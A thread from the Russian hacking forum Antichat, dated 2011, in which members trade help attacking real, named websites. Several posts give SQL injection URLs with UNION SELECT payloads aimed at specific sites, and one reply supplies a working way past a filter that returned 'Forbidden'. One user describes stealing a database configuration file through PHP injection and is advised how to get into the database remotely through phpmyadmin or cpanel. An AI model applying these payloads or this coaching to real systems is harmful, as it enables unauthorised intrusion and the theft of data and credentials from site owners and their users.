HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17351  
Старый 20.06.2011, 14:48
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами: 8411065

Репутация: 4
По умолчанию

Как можно обойти такой фильтр?

http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1

просто переходит на:

http://www.onlymelbourne.com.au/melbourne.php

Заранее благодарю за любой ответ.
 
Ответить с цитированием

  #17352  
Старый 20.06.2011, 15:11
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

Цитата:
Сообщение от kroŧ  
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
Я думаю никак.

Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT
 
Ответить с цитированием

  #17353  
Старый 20.06.2011, 16:07
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами: 9761387

Репутация: 2
По умолчанию

Подобрал колличество полей. Вылезло Forbidden

можно как то обойти?)

_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
 
Ответить с цитированием

  #17354  
Старый 20.06.2011, 16:23
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Цитата:
Сообщение от GroM88  
Подобрал колличество полей. Вылезло
Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3 ,4,5,6,7,8,9,10,11,12,13)+--+
 
Ответить с цитированием

  #17355  
Старый 20.06.2011, 17:24
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

Через Php-injection вытащил dbconfig.php

$dbhost="localhost";

Пробую подключиться, вместо localhost пишу ip домена.

К базе подключаеться , а вот mysql_connect_db не работает

В чем может быть проблемма?

спасибо
 
Ответить с цитированием

  #17356  
Старый 20.06.2011, 17:41
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от stasiliy  
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
может mysql_select_db() ?
 
Ответить с цитированием

  #17357  
Старый 20.06.2011, 17:51
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
может mysql_select_db() ?
Да, просто ошшибку сделал когда вам писал.



вот что пишет


Цитата:
Сообщение от None  
Access denied for user 'user1_style_adm'@'%' to database 'user1_style'
 
Ответить с цитированием

  #17358  
Старый 20.06.2011, 17:53
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от stasiliy  
Да, просто ошшибку сделал когда вам писал.


вот что пишет

http://google.ru/translate

нету доступа к этой базе
 
Ответить с цитированием

  #17359  
Старый 20.06.2011, 17:56
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию

Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.

Цитата:
Сообщение от None  
SELECT count(field) FROM table
1234

Цитата:
Сообщение от None  
SELECT count(field) FROM table WHERE LENGTH(field)>0
1234

Цитата:
Сообщение от None  
SELECT LENGTH(field) FROM table LIMIT (1/10/1000),1
0

Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.
 
Ответить с цитированием

  #17360  
Старый 20.06.2011, 18:06
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от stasiliy  
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.